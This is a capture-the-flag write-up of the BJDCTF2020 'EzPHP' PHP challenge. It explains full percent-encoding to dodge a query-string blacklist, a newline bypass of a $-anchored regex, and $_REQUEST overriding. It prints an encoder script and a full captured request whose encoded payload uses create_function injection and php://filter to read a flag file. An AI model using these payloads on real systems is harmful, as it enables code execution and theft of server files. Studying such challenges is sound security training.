[BJDCTF2020]EzPHP

$_SERVER['QUERY_STRING']

if (preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING']))
    die('You seem to want to do something bad?');

Here I learned something.

$_SERVER['QUERY_STRING'] is NOT automatically URL-decoded, so the blacklist above only ever sees the raw bytes of the query string. If we percent-encode the whole query string once before sending it, the regex sees nothing but hex digits, which is the bypass.

$_GET[], on the other hand, is URL-decoded exactly once by PHP, so the decoded values still arrive where the application reads them.
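To make the two views concrete, here is an added Python 3 model (my own illustration, not code from the original post or from the challenge): the blacklist is copied from the challenge and is run over the raw query string the way $_SERVER['QUERY_STRING'] is checked, while php_get shows the once-decoded values that $_GET receives. hardened_filter_passes is the fix a developer would want, the same blacklist applied after decoding; full_encode, php_get and the other names are mine.

```python
import re
from urllib.parse import parse_qs

# The blacklist exactly as the challenge applies it to $_SERVER['QUERY_STRING'].
BLACKLIST = re.compile(
    r'''shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|'''
    r'''shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|'''
    r'''local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|'''
    r'''print|pi|\.|\"|\'|log''',
    re.I,
)


def full_encode(params):
    """Percent-encode every byte of every key and value; only '=' and '&'
    stay literal, so the raw query string is nothing but hex digits."""
    def enc(s):
        return ''.join('%%%02x' % b for b in s.encode())
    return '&'.join(enc(k) + '=' + enc(v) for k, v in params)


def query_string_filter_passes(raw):
    """What the challenge does: the regex runs over the RAW query string,
    with no decoding at all."""
    return BLACKLIST.search(raw) is None


def php_get(raw):
    """What $_GET sees: every key and value percent-decoded exactly once."""
    return {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def hardened_filter_passes(raw):
    """Fix: run the same blacklist over the decoded keys and values instead
    of (or in addition to) the raw query string."""
    for k, v in php_get(raw).items():
        if BLACKLIST.search(k) or BLACKLIST.search(v):
            return False
    return True


if __name__ == '__main__':
    # Constructed sample: the two parameters from the post, fully encoded.
    raw = full_encode([('debu', 'aqua_is_cute\n'),
                       ('file', 'data://text/plain,debu_debu_aqua')])
    print(raw)
    print('raw filter passes:', query_string_filter_passes(raw))
    print('$_GET sees:', php_get(raw))
    print('hardened filter passes:', hardened_filter_passes(raw))
```

The unencoded form `debu=aqua_is_cute%0a` is rejected immediately (the literal "debu" is in the blacklist), the fully encoded form sails through, and the hardened variant catches it again because it looks at what the application will actually use.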

This part is really nasty: combined with the other filters it makes an extremely painful set, and you have to type the encoded form every single time.

For example, when passing the debu parameter.

Below is an example script that generates the encoded debu parameter (originally written for Python 2 using str.encode('hex'); shown here in Python 3 form with the same output).

# Percent-encode every character except '=' so that the blacklist applied to
# $_SERVER['QUERY_STRING'] sees only hex digits, while $_GET decodes it once.
def payloadIng(fxck):
    payload = ""
    for i in fxck:
        if i != '=':
            payload += "%" + i.encode().hex()   # one byte -> %xx (e.g. '\n' -> %0a)
        else:
            payload += i                        # keep '=' so key=value survives
    return payload

debu = "debu=aqua_is_cute\n"
file = "file=data://text/plain,debu_debu_aqua"

part_debu = payloadIng(debu)
print(part_debu)

part_file = payloadIng(file)
print(part_file)

# output

#%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a

#%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61

# a further payload (flag[arg]=...&flag=create_function) encoded the same way; not produced by the two calls above:

#%66%6c%61%67%5b%61%72%67%5d=%7d%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f%26%66%6c%61%67=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e

Below I'll explain why.

The value sent for debu is debu=aqua_is_cute\n (note the trailing newline), and file is file=data://text/plain,debu_debu_aqua.

The second regex:

if (!preg_match('/http|https/i', $_GET['file'])) {
    if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
        $file = $_GET["file"];
        echo "Neeeeee! Good Job!\n";
    }
} else die('fxck you! What do you want to do ?!');

/^aqua_is_cute$/ has no modifier after the closing slash, so a trailing newline (%0a) gets us past it: without the D (PCRE_DOLLAR_ENDONLY) modifier, $ matches not only at the very end of the subject but also just before a final newline, so "aqua_is_cute\n" matches the pattern while still being !== 'aqua_is_cute'.

A few pattern modifiers, for reference.

i: ignoreCase, case-insensitive matching

m: multiline, ^ and $ also match at line breaks inside the subject

g: global matching, i.e. keep matching until the end of the subject. Note this is a JavaScript flag; PHP's preg_* functions have no g modifier (preg_match_all plays that role).

The modifier that actually matters for this check is D (PCRE_DOLLAR_ENDONLY): with it, $ matches only at the true end of the subject; without it, $ also matches right before a trailing newline.

So by appending a newline we match the target pattern exactly, while the string we send is not identical to the target string.

debu=aqua_is_cute\n

Remember to URL-encode it (the newline becomes %0a, and with the first filter the rest has to be encoded too)..............
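To see exactly which inputs slip through that check, here is an added Python 3 model (my own illustration, not code from the post or the challenge). Python's $ without re.MULTILINE has the same rule as PCRE's $ without D, so the three matchers below stand in for /^aqua_is_cute$/, /^aqua_is_cute$/D (Python spells that end-only anchor \Z) and /^aqua_is_cute$/m; the function names and the candidate list are mine.

```python
import re

TARGET = 'aqua_is_cute'


def pcre_default_match(debu):
    """Mirrors preg_match('/^aqua_is_cute$/', $debu): without the D modifier,
    '$' also matches just before ONE trailing newline. Python's '$' without
    re.MULTILINE behaves the same way."""
    return re.search(r'^aqua_is_cute$', debu) is not None


def pcre_dollar_endonly_match(debu):
    """Mirrors preg_match('/^aqua_is_cute$/D', $debu) (or using \z instead
    of $): the anchor is only the true end of the subject. In Python that
    anchor is \Z."""
    return re.search(r'^aqua_is_cute\Z', debu) is not None


def pcre_multiline_match(debu):
    """Mirrors preg_match('/^aqua_is_cute$/m', $debu): the m modifier makes
    it worse, '$' now matches before every newline in the subject."""
    return re.search(r'^aqua_is_cute$', debu, re.M) is not None


def challenge_check(debu, matcher=pcre_default_match):
    """preg_match(...) && $_GET['debu'] !== 'aqua_is_cute'"""
    return matcher(debu) and debu != TARGET


def bypass_candidates(matcher=pcre_default_match):
    """Which constructed inputs satisfy the challenge condition under a
    given matcher."""
    candidates = [
        TARGET,             # exact value: regex matches, but !== fails
        TARGET + '\n',      # the trick from the post
        TARGET + '\n\n',    # two newlines: '$' only tolerates one
        TARGET + '\nX',     # text after the newline
        TARGET + ' ',       # trailing space is not a newline
    ]
    return [c for c in candidates if challenge_check(c, matcher)]


if __name__ == '__main__':
    for name, m in [('default', pcre_default_match),
                    ('D modifier', pcre_dollar_endonly_match),
                    ('m modifier', pcre_multiline_match)]:
        print(name, [repr(c) for c in bypass_candidates(m)])
```

Under the default semantics exactly one candidate passes, "aqua_is_cute\n"; with the D modifier (or \z) nothing passes, which is the one-character fix for this check; with m the newline trick works even when more text follows.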

preg_match('/[a-zA-Z]/i', $value)

An inhuman regex: any request value that contains a single letter is rejected.

if ($_REQUEST) {
    foreach ($_REQUEST as $value) {
        if (preg_match('/[a-zA-Z]/i', $value))
            die('fxck you! I hate English!');
    }
}

Went back again to read a master's writeup.

Ahh... I've been sitting here all afternoon until now, too tired... not writing any more, just leaving my request here.

Good for reviewing later; I'll write the proper writeup another day.

POST /1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%61%72%67%5d=%7d%72%65%71%75%69%72%65%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%5b%5f%47%45%54%5d%5b%72%63%65%5d%29%3b%2f%2f&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e&rce=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%72%65%61%64%3d%63%6f%6e%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65%2f%72%65%73%6f%75%72%63%65%3d%72%65%61%31%66%6c%34%67%2e%70%68%70 HTTP/1.1

Host: b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn

Content-Length: 29

Pragma: no-cache

Cache-Control: no-cache

Upgrade-Insecure-Requests: 1

Origin: http://b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://b1d178c8-f2f4-4376-a7db-3b42c0ad8725.node3.buuoj.cn/1nD3x.php?%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&%73%68%61%6e%61%5b%5d=%31&%70%61%73%73%77%64%5b%5d=%32&%66%6c%61%67%5b%61%72%67%5d=%7d%72%65%71%75%69%72%65%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%4d%57%5a%73%59%57%63%75%63%47%68%77%29%29%3b%76%61%72%5f%64%75%6d%70%28%67%65%74%5f%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%29%3b%2f%2f&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74%69%6f%6e

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

file=1&%64%65%62%75=1&rce=2
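Walking the captured request above through the three checks quoted on this page, as an added Python 3 model rather than the challenge's own code (the function names are mine; the query string and body are copied from the request). php_parse mimics how PHP fills $_GET and $_POST: one percent-decode, with name[] and name[key] becoming arrays. check_request models $_REQUEST as GET overlaid by POST (PHP's default request_order, so the numeric POST body replaces the letter-bearing GET values of file, debu and rce) and the PHP 7 behaviour that preg_match() on an array value only emits a warning and returns NULL, so the shana[], passwd[] and flag[...] arrays slip through (PHP 8 would throw a TypeError instead). Only the checks shown on this page are modeled; whatever the challenge later does with shana, passwd, flag and rce is not.

```python
import re
from urllib.parse import unquote_plus

# First filter, copied from the challenge: applied to the raw query string.
BLACKLIST = re.compile(
    r'''shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|'''
    r'''shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|'''
    r'''local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|'''
    r'''print|pi|\.|\"|\'|log''',
    re.I,
)

# Query string and body of the captured POST (copied from the request above).
QUERY = (
    "%64%65%62%75=%61%71%75%61%5f%69%73%5f%63%75%74%65%0a"
    "&%66%69%6c%65=%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%2c"
    "%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61"
    "&%73%68%61%6e%61%5b%5d=%31"
    "&%70%61%73%73%77%64%5b%5d=%32"
    "&%66%6c%61%67%5b%61%72%67%5d=%7d%72%65%71%75%69%72%65%28%67%65%74%5f"
    "%64%65%66%69%6e%65%64%5f%76%61%72%73%28%29%5b%5f%47%45%54%5d%5b%72%63"
    "%65%5d%29%3b%2f%2f"
    "&%66%6c%61%67%5b%63%6f%64%65%5d=%63%72%65%61%74%65%5f%66%75%6e%63%74"
    "%69%6f%6e"
    "&rce=%70%68%70%3a%2f%2f%66%69%6c%74%65%72%2f%72%65%61%64%3d%63%6f%6e"
    "%76%65%72%74%2e%62%61%73%65%36%34%2d%65%6e%63%6f%64%65%2f%72%65%73%6f"
    "%75%72%63%65%3d%72%65%61%31%66%6c%34%67%2e%70%68%70"
)
BODY = "file=1&%64%65%62%75=1&rce=2"


def php_parse(raw):
    """Model of how PHP fills $_GET / $_POST: each key and value is
    percent-decoded exactly once; 'name[]' appends to an array and
    'name[key]' sets a key (arrays are represented as dicts here)."""
    params = {}
    for pair in raw.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        key, value = unquote_plus(key), unquote_plus(value)
        m = re.match(r'^([^\[]+)\[([^\]]*)\]$', key)
        if m:
            name, index = m.groups()
            arr = params.setdefault(name, {})
            arr[index or str(len(arr))] = value
        else:
            params[key] = value
    return params


def check_query_string(raw):
    """Check 1: the blacklist runs over $_SERVER['QUERY_STRING'], undecoded."""
    return BLACKLIST.search(raw) is None


def check_debu_file(get):
    """Check 2: no http(s) in file, and debu must satisfy /^aqua_is_cute$/
    while not being identical to 'aqua_is_cute' (the trailing-newline trick)."""
    file_, debu = get.get('file', ''), get.get('debu', '')
    if re.search(r'http|https', file_, re.I):
        return False
    return re.search(r'^aqua_is_cute$', debu) is not None and debu != 'aqua_is_cute'


def check_request(get, post):
    """Check 3: no $_REQUEST value may contain a letter. $_REQUEST is GET
    overlaid by POST, so the numeric body wins for file, debu and rce.
    Array values are skipped, modeling PHP 7's preg_match() returning NULL
    (with a warning) for a non-string subject."""
    request = {**get, **post}
    for value in request.values():
        if isinstance(value, dict):
            continue
        if re.search(r'[a-zA-Z]', value):
            return False
    return True


def run_all(query=QUERY, body=BODY):
    get, post = php_parse(query), php_parse(body)
    return {
        'query_string': check_query_string(query),
        'debu_file': check_debu_file(get),
        'request': check_request(get, post),
        'get': get,
    }


if __name__ == '__main__':
    for name, result in run_all().items():
        print(name, result)
```

Running it shows all three checks returning True for the captured request, and check_request turning False if the POST body is dropped, because $_REQUEST would then still hold the letter-bearing GET values.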


While doing the challenge, I noticed the group chatting. How to put it, having someone push you along is really nice, like a teacher, like family, very warm; maybe I've just gotten used to being pushed.

I was brought into this field by the big brothers in the first place.

Now I really do like it, and I'm willing to keep up this feeling of "grinding".

Even if I can't do it, even if I don't understand anything, I still have the mood to keep at it.

I hope I can keep this passion.

Even if I stay a noob forever (I hope I can contribute someday too, and not be someone who only takes).
